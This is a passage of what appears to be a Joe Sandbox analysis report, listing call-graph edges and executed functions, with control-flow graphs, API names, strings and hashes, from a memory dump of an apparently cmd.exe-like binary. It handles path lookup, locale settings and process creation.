22527->22135 22527->22158 22528 7ff7ab12c5bd 22529 7ff7ab12c541 22528->22529 22532 7ff7ab12b6b0 170 API calls 22528->22532 22529->22527 22531 7ff7ab12ff70 2 API calls 22529->22531 22530 7ff7ab12d840 178 API calls 22530->22533 22531->22527 22532->22529 22533->22527 22533->22528 22533->22529 22533->22530 22535 7ff7ab12b018 22534->22535 22535->22197 22536->22197 22538 7ff7ab1272de 22537->22538 22539 7ff7ab144621 22537->22539 22541 7ff7ab1272eb 22538->22541 22545 7ff7ab144467 22538->22545 22546 7ff7ab144530 22538->22546 22540 7ff7ab1447e0 22539->22540 22542 7ff7ab14447b longjmp 22539->22542 22547 7ff7ab144639 22539->22547 22565 7ff7ab14475e 22539->22565 22543 7ff7ab127348 168 API calls 22540->22543 22598 7ff7ab127348 22541->22598 22548 7ff7ab144492 22542->22548 22549 7ff7ab144524 22543->22549 22545->22541 22545->22548 22557 7ff7ab144475 22545->22557 22554 7ff7ab127348 168 API calls 22546->22554 22551 7ff7ab14463e 22547->22551 22552 7ff7ab144695 22547->22552 22553 7ff7ab127348 168 API calls 22548->22553 22559 7ff7ab1272b0 168 API calls 22549->22559 22562 7ff7ab127323 22549->22562 22551->22542 22563 7ff7ab144654 22551->22563 22556 7ff7ab1273d4 168 API calls 22552->22556 22573 7ff7ab1444a8 22553->22573 22574 7ff7ab144549 22554->22574 22555 7ff7ab127315 22613 7ff7ab1273d4 22555->22613 22578 7ff7ab14469a 22556->22578 22557->22542 22557->22552 22558 7ff7ab127348 168 API calls 22558->22540 22566 7ff7ab14480e 22559->22566 22560 7ff7ab127348 168 API calls 22560->22555 22562->22233 22575 7ff7ab127348 168 API calls 22563->22575 22564 7ff7ab1445b2 22568 7ff7ab127348 168 API calls 22564->22568 22565->22558 22566->22233 22567 7ff7ab1446e1 22570 7ff7ab1272b0 168 API calls 22567->22570 22571 7ff7ab1445c7 22568->22571 22569 7ff7ab14455e 22569->22564 22579 7ff7ab127348 168 API calls 22569->22579 22577 7ff7ab144738 22570->22577 22580 7ff7ab127348 168 API calls 22571->22580 22572 7ff7ab1444e2 22576 7ff7ab1272b0 168 API calls 22572->22576 22573->22572 22581 7ff7ab127348 168 API calls 22573->22581 22574->22564 22574->22569 22586 7ff7ab127348 168 API calls 22574->22586 22575->22562 22582 7ff7ab1444f1 22576->22582 22583 7ff7ab127348 168 API calls 22577->22583 22578->22567 22589 7ff7ab1446ea 22578->22589 22590 7ff7ab1446c7 22578->22590 22579->22564 22584 7ff7ab1445db 22580->22584 22581->22572 22585 7ff7ab1272b0 168 API calls 22582->22585 22583->22549 22587 7ff7ab127348 168 API calls 22584->22587 22588 7ff7ab144503 22585->22588 22586->22569 22591 7ff7ab1445ec 22587->22591 22588->22562 22594 7ff7ab127348 168 API calls 22588->22594 22592 7ff7ab127348 168 API calls 22589->22592 22590->22567 22595 7ff7ab127348 168 API calls 22590->22595 22593 7ff7ab127348 168 API calls 22591->22593 22592->22567 22596 7ff7ab144600 22593->22596 22594->22549 22595->22567 22597 7ff7ab127348 168 API calls 22596->22597 22597->22549 22602 7ff7ab12735d 22598->22602 22599 7ff7ab123278 166 API calls 22600 7ff7ab144820 longjmp 22599->22600 22601 7ff7ab144838 22600->22601 22603 7ff7ab123278 166 API calls 22601->22603 22602->22599 22602->22601 22602->22602 22612 7ff7ab1273ab 22602->22612 22604 7ff7ab144844 longjmp 22603->22604 22605 7ff7ab14485a 22604->22605 22606 7ff7ab127348 166 API calls 22605->22606 22607 7ff7ab14487b 22606->22607 22608 7ff7ab127348 166 API calls 22607->22608 22609 7ff7ab1448ad 22608->22609 22610 7ff7ab127348 166 API calls 22609->22610 22611 7ff7ab1272ff 22610->22611 22611->22555 22611->22560 22614 7ff7ab127401 22613->22614 22614->22562 22615 7ff7ab127348 168 API calls 22614->22615 22616 7ff7ab14487b 22615->22616 22617 7ff7ab127348 168 API calls 22616->22617 22618 7ff7ab1448ad 22617->22618 22619 7ff7ab127348 168 API calls 22618->22619 22620 7ff7ab1448be 22619->22620 22620->22562

                                                                                                          Executed Functions

                                                                                                          Function 00007FF7AB130A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                          • API String ID: 3305344409-4288247545
                                                                                                          • Opcode ID: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                                          • Instruction ID: 79d77c98f87dcad91783f6f28e59adca2d96c93fe89fa48cbd7ceb25bee9b742
                                                                                                          • Opcode Fuzzy Hash: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                                          • Instruction Fuzzy Hash: AE42DB21A0A68285EB9AAB19F4542B9E791FF4579CFC64230DD1E477F4EF3CE1588320
                                                                                                          Function 00007FF7AB12AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 216 7ff7ab12aa54-7ff7ab12aa98 call 7ff7ab12cd90 219 7ff7ab13bf5a-7ff7ab13bf70 call 7ff7ab134c1c call 7ff7ab12ff70 216->219 220 7ff7ab12aa9e 216->220 221 7ff7ab12aaa5-7ff7ab12aaa8 220->221 223 7ff7ab12acde-7ff7ab12ad00 221->223 224 7ff7ab12aaae-7ff7ab12aac8 wcschr 221->224 229 7ff7ab12ad06 223->229 224->223 226 7ff7ab12aace-7ff7ab12aae9 towlower 224->226 226->223 228 7ff7ab12aaef-7ff7ab12aaf3 226->228 231 7ff7ab12aaf9-7ff7ab12aafd 228->231 232 7ff7ab13beb7-7ff7ab13bec4 call 7ff7ab14eaf0 228->232 233 7ff7ab12ad0d-7ff7ab12ad1f 229->233 235 7ff7ab13bbcf 231->235 236 7ff7ab12ab03-7ff7ab12ab07 231->236 243 7ff7ab13bec6-7ff7ab13bed8 call 7ff7ab123240 232->243 244 7ff7ab13bf43-7ff7ab13bf59 call 7ff7ab134c1c 232->244 237 7ff7ab12ad22-7ff7ab12ad2a call 7ff7ab1313e0 233->237 245 7ff7ab13bbde 235->245 240 7ff7ab12ab09-7ff7ab12ab0d 236->240 241 7ff7ab12ab7d-7ff7ab12ab81 236->241 237->221 247 7ff7ab13be63 240->247 248 7ff7ab12ab13-7ff7ab12ab17 240->248 246 7ff7ab12ab87-7ff7ab12ab95 241->246 241->247 243->244 261 7ff7ab13beda-7ff7ab13bee9 call 7ff7ab123240 243->261 244->219 257 7ff7ab13bbea-7ff7ab13bbec 245->257 252 7ff7ab12ab98-7ff7ab12aba0 246->252 254 7ff7ab13be72-7ff7ab13be88 call 7ff7ab123278 call 7ff7ab134c1c 247->254 248->241 253 7ff7ab12ab19-7ff7ab12ab1d 248->253 252->252 258 7ff7ab12aba2-7ff7ab12abb3 call 7ff7ab12cd90 252->258 253->245 259 7ff7ab12ab23-7ff7ab12ab27 253->259 281 7ff7ab13be89-7ff7ab13be8c 254->281 267 7ff7ab13bbf8-7ff7ab13bc01 257->267 258->219 272 7ff7ab12abb9-7ff7ab12abde call 7ff7ab1313e0 call 7ff7ab1333a8 258->272 259->257 263 7ff7ab12ab2d-7ff7ab12ab31 259->263 276 7ff7ab13beeb-7ff7ab13bef1 261->276 277 7ff7ab13bef3-7ff7ab13bef9 261->277 263->229 264 7ff7ab12ab37-7ff7ab12ab3b 263->264 264->267 269 7ff7ab12ab41-7ff7ab12ab45 264->269 267->233 273 7ff7ab12ab4b-7ff7ab12ab4f 269->273 274 7ff7ab13bc06-7ff7ab13bc2a call 7ff7ab1313e0 269->274 306 7ff7ab12ac75 272->306 307 7ff7ab12abe4-7ff7ab12abe7 272->307 279 7ff7ab12ad2f-7ff7ab12ad33 273->279 280 7ff7ab12ab55-7ff7ab12ab78 call 7ff7ab1313e0 273->280 301 7ff7ab13bc5a-7ff7ab13bc61 274->301 302 7ff7ab13bc2c-7ff7ab13bc4c _wcsnicmp 274->302 276->244 276->277 277->244 282 7ff7ab13befb-7ff7ab13bf0d call 7ff7ab123240 277->282 290 7ff7ab12ad39-7ff7ab12ad3d 279->290 291 7ff7ab13bc66-7ff7ab13bc8a call 7ff7ab1313e0 279->291 280->221 286 7ff7ab12acbe 281->286 287 7ff7ab13be92-7ff7ab13beaa call 7ff7ab123278 call 7ff7ab134c1c 281->287 282->244 313 7ff7ab13bf0f-7ff7ab13bf21 call 7ff7ab123240 282->313 298 7ff7ab12acc0-7ff7ab12acc7 286->298 340 7ff7ab13beab-7ff7ab13beb6 call 7ff7ab134c1c 287->340 293 7ff7ab13bcde-7ff7ab13bd02 call 7ff7ab1313e0 290->293 294 7ff7ab12ad43-7ff7ab12ad49 290->294 319 7ff7ab13bc8c-7ff7ab13bcaa _wcsnicmp 291->319 320 7ff7ab13bcc4-7ff7ab13bcdc 291->320 335 7ff7ab13bd2a 293->335 336 7ff7ab13bd04-7ff7ab13bd24 _wcsnicmp 293->336 304 7ff7ab13bd5e-7ff7ab13bd65 294->304 305 7ff7ab12ad4f-7ff7ab12ad68 294->305 298->298 310 7ff7ab12acc9-7ff7ab12acda 298->310 308 7ff7ab13bd31-7ff7ab13bd4f _wcsnicmp 301->308 302->301 303 7ff7ab13bc4e-7ff7ab13bc55 302->303 314 7ff7ab13bbb3-7ff7ab13bbb7 303->314 304->305 315 7ff7ab13bd6b-7ff7ab13bd73 304->315 316 7ff7ab12ad6a 305->316 317 7ff7ab12ad6d-7ff7ab12ad70 305->317 323 7ff7ab12ac77-7ff7ab12ac7f 306->323 307->286 318 7ff7ab12abed-7ff7ab12ac0b call 7ff7ab12cd90 * 2 307->318 325 7ff7ab13bbc2-7ff7ab13bbca 308->325 326 7ff7ab13bd55 308->326 310->223 313->244 343 7ff7ab13bf23-7ff7ab13bf35 call 7ff7ab123240 313->343 327 7ff7ab13bbba-7ff7ab13bbbd call 7ff7ab1313e0 314->327 328 7ff7ab13be4a-7ff7ab13be5e 315->328 329 7ff7ab13bd79-7ff7ab13bd8b iswxdigit 315->329 316->317 317->237 318->340 356 7ff7ab12ac11-7ff7ab12ac14 318->356 319->320 333 7ff7ab13bcac-7ff7ab13bcbf 319->333 320->308 323->286 331 7ff7ab12ac81-7ff7ab12ac85 323->331 325->221 326->304 327->325 328->327 329->328 338 7ff7ab13bd91-7ff7ab13bda3 iswxdigit 329->338 342 7ff7ab12ac88-7ff7ab12ac8f 331->342 333->314 335->308 336->335 341 7ff7ab13bbac 336->341 338->328 344 7ff7ab13bda9-7ff7ab13bdbb iswxdigit 338->344 340->232 341->314 342->342 346 7ff7ab12ac91-7ff7ab12ac94 342->346 343->244 358 7ff7ab13bf37-7ff7ab13bf3e call 7ff7ab123240 343->358 344->328 351 7ff7ab13bdc1-7ff7ab13bdd7 iswdigit 344->351 346->286 349 7ff7ab12ac96-7ff7ab12acaa wcsrchr 346->349 349->286 357 7ff7ab12acac-7ff7ab12acb9 call 7ff7ab131300 349->357 354 7ff7ab13bdd9-7ff7ab13bddd 351->354 355 7ff7ab13bddf-7ff7ab13bdeb towlower 351->355 361 7ff7ab13bdee-7ff7ab13be0f iswdigit 354->361 355->361 356->340 362 7ff7ab12ac1a-7ff7ab12ac33 memset 356->362 357->286 358->244 363 7ff7ab13be17-7ff7ab13be23 towlower 361->363 364 7ff7ab13be11-7ff7ab13be15 361->364 362->306 365 7ff7ab12ac35-7ff7ab12ac4b wcschr 362->365 366 7ff7ab13be26-7ff7ab13be45 call 7ff7ab1313e0 363->366 364->366 365->306 367 7ff7ab12ac4d-7ff7ab12ac54 365->367 366->328 368 7ff7ab12ac5a-7ff7ab12ac6f wcschr 367->368 369 7ff7ab12ad72-7ff7ab12ad91 wcschr 367->369 368->306 368->369 371 7ff7ab12ad97-7ff7ab12adac wcschr 369->371 372 7ff7ab12af03-7ff7ab12af07 369->372 371->372 373 7ff7ab12adb2-7ff7ab12adc7 wcschr 371->373 372->306 373->372 374 7ff7ab12adcd-7ff7ab12ade2 wcschr 373->374 374->372 375 7ff7ab12ade8-7ff7ab12adfd wcschr 374->375 375->372 376 7ff7ab12ae03-7ff7ab12ae18 wcschr 375->376 376->372 377 7ff7ab12ae1e-7ff7ab12ae21 376->377 378 7ff7ab12ae24-7ff7ab12ae27 377->378 378->372 379 7ff7ab12ae2d-7ff7ab12ae40 iswspace 378->379 380 7ff7ab12ae4b-7ff7ab12ae5e 379->380 381 7ff7ab12ae42-7ff7ab12ae49 379->381 382 7ff7ab12ae66-7ff7ab12ae6d 380->382 381->378 382->382 383 7ff7ab12ae6f-7ff7ab12ae77 382->383 383->254 384 7ff7ab12ae7d-7ff7ab12ae97 call 7ff7ab1313e0 383->384 387 7ff7ab12ae9a-7ff7ab12aea4 384->387 388 7ff7ab12aebc-7ff7ab12aef8 call 7ff7ab130a6c call 7ff7ab12ff70 * 2 387->388 389 7ff7ab12aea6-7ff7ab12aead 387->389 388->323 397 7ff7ab12aefe 388->397 389->388 390 7ff7ab12aeaf-7ff7ab12aeba 389->390 390->387 390->388 397->281
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                          • API String ID: 972821348-467788257
                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                          • Instruction ID: 751eb7f962b7d793ba3889f909c250019c7013fee953a46f920da3de5c2b07a6
                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                          • Instruction Fuzzy Hash: 6F22B721A0A682C5EB5ABF2DF554279E691EF45B88FCA8135C90E473B4EF3DA444C370
                                                                                                          Function 00007FF7AB1351EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 398 7ff7ab1351ec-7ff7ab135248 call 7ff7ab135508 GetLocaleInfoW 401 7ff7ab13524e-7ff7ab135272 GetLocaleInfoW 398->401 402 7ff7ab13ef32-7ff7ab13ef3c 398->402 404 7ff7ab135295-7ff7ab1352b9 GetLocaleInfoW 401->404 405 7ff7ab135274-7ff7ab13527a 401->405 403 7ff7ab13ef3f-7ff7ab13ef49 402->403 408 7ff7ab13ef4b-7ff7ab13ef52 403->408 409 7ff7ab13ef61-7ff7ab13ef6c 403->409 406 7ff7ab1352de-7ff7ab135305 GetLocaleInfoW 404->406 407 7ff7ab1352bb-7ff7ab1352c3 404->407 410 7ff7ab1354f7-7ff7ab1354f9 405->410 411 7ff7ab135280-7ff7ab135286 405->411 414 7ff7ab135307-7ff7ab13531b 406->414 415 7ff7ab135321-7ff7ab135343 GetLocaleInfoW 406->415 412 7ff7ab1352c9-7ff7ab1352d7 407->412 413 7ff7ab13ef75-7ff7ab13ef78 407->413 408->409 416 7ff7ab13ef54-7ff7ab13ef5f 408->416 409->413 410->402 411->410 417 7ff7ab13528c-7ff7ab13528f 411->417 412->406 420 7ff7ab13ef7a-7ff7ab13ef7d 413->420 421 7ff7ab13ef99-7ff7ab13efa3 413->421 414->415 418 7ff7ab135349-7ff7ab13536e GetLocaleInfoW 415->418 419 7ff7ab13efaf-7ff7ab13efb9 415->419 416->403 416->409 417->404 423 7ff7ab13eff2-7ff7ab13effc 418->423 424 7ff7ab135374-7ff7ab135396 GetLocaleInfoW 418->424 422 7ff7ab13efbc-7ff7ab13efc6 419->422 420->406 425 7ff7ab13ef83-7ff7ab13ef8d 420->425 421->419 426 7ff7ab13efc8-7ff7ab13efcf 422->426 427 7ff7ab13efde-7ff7ab13efe9 422->427 428 7ff7ab13efff-7ff7ab13f009 423->428 429 7ff7ab13539c-7ff7ab1353be GetLocaleInfoW 424->429 430 7ff7ab13f035-7ff7ab13f03f 424->430 425->421 426->427 431 7ff7ab13efd1-7ff7ab13efdc 426->431 427->423 432 7ff7ab13f00b-7ff7ab13f012 428->432 433 7ff7ab13f021-7ff7ab13f02c 428->433 434 7ff7ab13f078-7ff7ab13f082 429->434 435 7ff7ab1353c4-7ff7ab1353e6 GetLocaleInfoW 429->435 436 7ff7ab13f042-7ff7ab13f04c 430->436 431->422 431->427 432->433 438 7ff7ab13f014-7ff7ab13f01f 432->438 433->430 437 7ff7ab13f085-7ff7ab13f08f 434->437 439 7ff7ab13f0bb-7ff7ab13f0c5 435->439 440 7ff7ab1353ec-7ff7ab13540e GetLocaleInfoW 435->440 441 7ff7ab13f04e-7ff7ab13f055 436->441 442 7ff7ab13f064-7ff7ab13f06f 436->442 443 7ff7ab13f0a7-7ff7ab13f0b2 437->443 444 7ff7ab13f091-7ff7ab13f098 437->444 438->428 438->433 445 7ff7ab13f0c8-7ff7ab13f0d2 439->445 446 7ff7ab13f0fe-7ff7ab13f108 440->446 447 7ff7ab135414-7ff7ab135436 GetLocaleInfoW 440->447 441->442 448 7ff7ab13f057-7ff7ab13f062 441->448 442->434 443->439 444->443 449 7ff7ab13f09a-7ff7ab13f0a5 444->449 450 7ff7ab13f0ea-7ff7ab13f0f5 445->450 451 7ff7ab13f0d4-7ff7ab13f0db 445->451 454 7ff7ab13f10b-7ff7ab13f115 446->454 452 7ff7ab13543c-7ff7ab13545e GetLocaleInfoW 447->452 453 7ff7ab13f141-7ff7ab13f14b 447->453 448->436 448->442 449->437 449->443 450->446 451->450 458 7ff7ab13f0dd-7ff7ab13f0e8 451->458 459 7ff7ab13f184-7ff7ab13f18b 452->459 460 7ff7ab135464-7ff7ab135486 GetLocaleInfoW 452->460 457 7ff7ab13f14e-7ff7ab13f158 453->457 455 7ff7ab13f117-7ff7ab13f11e 454->455 456 7ff7ab13f12d-7ff7ab13f138 454->456 455->456 461 7ff7ab13f120-7ff7ab13f12b 455->461 456->453 462 7ff7ab13f15a-7ff7ab13f161 457->462 463 7ff7ab13f170-7ff7ab13f17b 457->463 458->445 458->450 464 7ff7ab13f18e-7ff7ab13f198 459->464 465 7ff7ab13548c-7ff7ab1354ae GetLocaleInfoW 460->465 466 7ff7ab13f1c4-7ff7ab13f1ce 460->466 461->454 461->456 462->463 468 7ff7ab13f163-7ff7ab13f16e 462->468 463->459 469 7ff7ab13f19a-7ff7ab13f1a1 464->469 470 7ff7ab13f1b0-7ff7ab13f1bb 464->470 471 7ff7ab13f207-7ff7ab13f20e 465->471 472 7ff7ab1354b4-7ff7ab1354f5 setlocale call 7ff7ab138f80 465->472 467 7ff7ab13f1d1-7ff7ab13f1db 466->467 474 7ff7ab13f1dd-7ff7ab13f1e4 467->474 475 7ff7ab13f1f3-7ff7ab13f1fe 467->475 468->457 468->463 469->470 477 7ff7ab13f1a3-7ff7ab13f1ae 469->477 470->466 476 7ff7ab13f211-7ff7ab13f21b 471->476 474->475 479 7ff7ab13f1e6-7ff7ab13f1f1 474->479 475->471 480 7ff7ab13f21d-7ff7ab13f224 476->480 481 7ff7ab13f233-7ff7ab13f23e 476->481 477->464 477->470 479->467 479->475 480->481 482 7ff7ab13f226-7ff7ab13f231 480->482 482->476 482->481
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                          • Instruction ID: 023e1e2112c6c82e44016d12d2dc4239781cb0b8cb1a2849af190030379c36e4
                                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                          • Instruction Fuzzy Hash: 42F16C31B0A74285EA56AF1DF9502B9A7A5BF04B88FD64136CA1D473B4EF3CE509C360
                                                                                                          Function 00007FF7AB134224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 483 7ff7ab134224-7ff7ab1342a5 InitializeProcThreadAttributeList 484 7ff7ab1342ab-7ff7ab1342e5 UpdateProcThreadAttribute 483->484 485 7ff7ab13ecd4-7ff7ab13ecee GetLastError call 7ff7ab149eec 483->485 487 7ff7ab1342eb-7ff7ab1343c6 memset * 2 GetStartupInfoW call 7ff7ab133a90 call 7ff7ab12b900 484->487 488 7ff7ab13ecf0-7ff7ab13ed19 GetLastError call 7ff7ab149eec DeleteProcThreadAttributeList 484->488 492 7ff7ab13ed1e 485->492 497 7ff7ab134638-7ff7ab134644 _local_unwind 487->497 498 7ff7ab1343cc-7ff7ab1343d3 487->498 488->492 499 7ff7ab134649-7ff7ab134650 497->499 498->499 500 7ff7ab1343d9-7ff7ab1343dc 498->500 499->500 503 7ff7ab134656-7ff7ab13465d 499->503 501 7ff7ab1343de-7ff7ab1343f5 wcsrchr 500->501 502 7ff7ab134415-7ff7ab134424 call 7ff7ab135a68 500->502 501->502 506 7ff7ab1343f7-7ff7ab13440f lstrcmpW 501->506 509 7ff7ab134589-7ff7ab134590 502->509 510 7ff7ab13442a-7ff7ab134486 CreateProcessW 502->510 503->502 505 7ff7ab134663 503->505 505->500 506->502 508 7ff7ab134668-7ff7ab13466d call 7ff7ab149044 506->508 508->502 509->510 514 7ff7ab134596-7ff7ab1345fa CreateProcessAsUserW 509->514 512 7ff7ab13448b-7ff7ab13448f 510->512 515 7ff7ab134672-7ff7ab134682 GetLastError 512->515 516 7ff7ab134495-7ff7ab1344c7 CloseHandle call 7ff7ab13498c 512->516 514->512 518 7ff7ab13468d-7ff7ab134694 515->518 516->518 522 7ff7ab1344cd-7ff7ab1344e5 516->522 520 7ff7ab1346a2-7ff7ab1346ac 518->520 521 7ff7ab134696-7ff7ab1346a0 518->521 523 7ff7ab1346ae-7ff7ab1346b5 call 7ff7ab1397bc 520->523 526 7ff7ab134705-7ff7ab134707 520->526 521->520 521->523 524 7ff7ab1344eb-7ff7ab1344f2 522->524 525 7ff7ab1347a3-7ff7ab1347a9 522->525 541 7ff7ab1346b7-7ff7ab134701 call 7ff7ab17c038 523->541 542 7ff7ab134703 523->542 528 7ff7ab1344f8-7ff7ab134507 524->528 529 7ff7ab1345ff-7ff7ab134607 524->529 526->522 527 7ff7ab13470d-7ff7ab13472a call 7ff7ab12cd90 526->527 543 7ff7ab13473d-7ff7ab134767 call 7ff7ab1313e0 call 7ff7ab149eec call 7ff7ab12ff70 _local_unwind 527->543 544 7ff7ab13472c-7ff7ab134738 _local_unwind 527->544 532 7ff7ab13450d-7ff7ab134512 call 7ff7ab135cb4 528->532 533 7ff7ab134612-7ff7ab134616 528->533 529->528 534 7ff7ab13460d 529->534 547 7ff7ab134517-7ff7ab13455e call 7ff7ab1333f0 call 7ff7ab13498c 532->547 539 7ff7ab1347d7-7ff7ab1347df 533->539 540 7ff7ab13461c-7ff7ab134633 533->540 538 7ff7ab13476c-7ff7ab134773 534->538 538->528 548 7ff7ab134779-7ff7ab134780 538->548 545 7ff7ab1347e1-7ff7ab1347ed CloseHandle 539->545 546 7ff7ab1347f2-7ff7ab13483c call 7ff7ab12ff70 DeleteProcThreadAttributeList call 7ff7ab138f80 539->546 540->546 541->526 542->526 543->538 544->543 545->546 567 7ff7ab1347ae-7ff7ab1347ca call 7ff7ab1333f0 547->567 568 7ff7ab134564-7ff7ab134579 call 7ff7ab13498c 547->568 548->528 553 7ff7ab134786-7ff7ab134789 548->553 553->528 558 7ff7ab13478f-7ff7ab134792 553->558 558->525 559 7ff7ab134794-7ff7ab13479d call 7ff7ab14a250 558->559 559->525 559->528 567->539 568->546 576 7ff7ab13457f-7ff7ab134584 call 7ff7ab14a920 568->576 576->546
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                          • API String ID: 388421343-2905461000
                                                                                                          • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                                          • Instruction ID: 0bd5d1676b3002ff3256b252dd1c5e4af1fdf0ab2083330a296b9113d601642a
